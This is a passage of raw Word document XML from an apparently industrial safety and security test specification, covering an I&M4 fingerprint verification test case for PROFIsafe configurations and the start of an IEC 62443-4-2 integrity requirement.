      <w:tr w:rsidR="009305A1" w:rsidRPr="00D67CA6" w14:paraId="4990317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A38B97" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="532EE83C" w14:textId="76FC061A" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002C191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commentRangeStart w:id="5"/>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Incomplete identification (data)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="5"/>
            <w:r w:rsidRPr="006669AB">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="5"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w14:paraId="2700C20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BC6A31C" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6C2CD5" w14:textId="766401AC" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002C1914"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SVV-1 (Requirement-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="359433E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20F197" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E126A5" w14:textId="52425C89" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00DB0A87"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B0A87">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm that the safety data is identified: the I&amp;M4 signature (F_iParCRC + F_Par_CRC) uniquely characterises the loaded safety configuration, so that different configurations yield different fingerprints</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A87">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> establishing that data is identified (as a fingerprint), correcting the "data not addressed" premise. This is an identification test (does the fingerprint identify the config?), not a modification-evidence test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="675220B5"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198D67B" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79DBEFC2" w14:textId="77777777" w:rsidR="009C690F" w:rsidRDefault="009C690F"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C690F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Load configuration A; read I&amp;M4. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E0C314" w14:textId="77777777" w:rsidR="009C690F" w:rsidRDefault="009C690F"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C690F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Load a materially different configuration B; read I&amp;M4. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F68ECD3" w14:textId="0589F09F" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="009C690F"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C690F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Confirm the two fingerprints differ and each uniquely maps to its configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="58F1FC8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BDB996" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751E946E" w14:textId="77777777" w:rsidR="00B4467A" w:rsidRDefault="00B4467A"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B4467A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if distinct configurations produce distinct I&amp;M4 fingerprints (data identified via fingerprint). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8596AC" w14:textId="095DF8CD" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00B4467A"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B4467A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented limitation: the fingerprint identifies that a specific config is loaded but does not enumerate/classify which data elements are EHSR-critical (G-1 residual).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5671C226" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="00AF57B2" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532165A" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">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9305A1" w14:paraId="27091D0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905FC6" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B70A0B" w14:textId="77777777" w:rsidR="009305A1"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305A1" w14:paraId="541807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ABE8B1" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150AA2E6" w14:textId="0EBEBD02" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00077660"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77660">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="3E332C4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8F030CB" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718CB61B" w14:textId="0F0A8019" w:rsidR="009305A1" w:rsidRPr="006868A2" w:rsidRDefault="004565B0"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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006868A2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>SPS 192.168.0.1, DUT 192.168.0.2; Pi mgmt path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="1BB035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C35C2F5" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458508D2" w14:textId="6B49338F" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="008821D6"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821D6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (load configs A/B); PN acyclic read for I&amp;M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="3D585A1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2065D6B" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="593ABC58" w14:textId="2F7386B8" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="007C695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C6951">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Read I&amp;M4 (config A) → load config B → read I&amp;M4; compare F_iParCRC/F_Par_CRC values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="358B7C3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849081" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A8532B" w14:textId="05C2306D" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002F3B96"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F3B96">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;M4(A) ≠ I&amp;M4(B); each fingerprint uniquely characterises its config (SRIO-3011)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00AD4B09" w14:paraId="476AAB8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328A531" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09561B86" w14:textId="1BEAB751" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002F3B96"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fingerprint unique per config (data identified)/ Content-level classification absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="7866A68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2438806" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53C6458A" w14:textId="6E184348" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="0044771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447719">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I&amp;M4 reads for A and B, config-vs-fingerprint mapping table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="150FA2B9" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D28391" w14:textId="64248EDF" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9D2C56" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231E7800" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8770D8" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D21C1C2" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7BE40F" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A2A990" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C77C58" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337D6D6A" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110758C9" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4820359A" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED971D0" w14:textId="77777777" w:rsidR="00865E92" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67453ED6" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1669728A" w14:textId="5A9F2222" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BD918"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6CA45A10" w14:textId="7C18443A" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="00707C48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78200AAD" w14:textId="689BD38D" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="00707C48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall protect identified safety-critical software and data against corruption, whether accidental or intentional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00467A39" w14:textId="75AB098E" w:rsidR="009C0A46" w:rsidRPr="00707C48" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00707C48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="00707C48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.4,</w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR 3.10,</w:t>
      </w:r>
      <w:r w:rsidR="00317411">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2B0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.12, EDR 3.13,</w:t>
      </w:r>
      <w:r w:rsidR="00707C48" w:rsidRPr="00707C48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDR 3.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB9B6C" w14:textId="0F325AB3" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="007970D9" w:rsidRPr="007970D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B (Runtime integrity), D (image integrity)</w:t>
      </w:r>
      <w:r w:rsidR="002417CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60165959" w14:textId="6C8650AF" w:rsidR="009C0A46" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0A46" w:rsidRPr="00280EAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66FAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Spoofing,) </w:t>
      </w:r>
      <w:r w:rsidR="007970D9" w:rsidRPr="007970D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65536FE6" w14:textId="77777777" w:rsidR="006E773B" w:rsidRPr="009C170F" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D643C2B" w14:textId="3C2CCA90" w:rsidR="009C170F" w:rsidRPr="009C170F" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iParCRC (UINT32) + F_ParCRC (UINT16)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
